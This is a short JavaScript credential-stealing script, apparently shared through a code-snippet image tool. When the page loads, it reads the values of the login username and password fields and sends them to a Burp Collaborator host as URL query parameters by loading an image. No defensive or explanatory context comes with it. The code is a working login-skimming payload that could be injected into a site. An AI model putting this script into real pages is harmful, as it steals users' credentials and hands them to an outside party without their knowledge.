console.log("password steal loaded."); function load() { var email=document.getElementById('login.username').value console.log(email); var pass=document.getElementById('login.password').value console.log(pass); new Image().src="https://pkdyhhynhiuhnza9gz4o.burpcollaborator.net/login?u=" + email + "&p=" + pass; } window.onload = load;
Preview:
downloadDownload PNG
downloadDownload JPEG
downloadDownload SVG
Tip: You can change the style, width & colours of the snippet with the inspect tool before clicking Download!
Click to optimize width for Twitter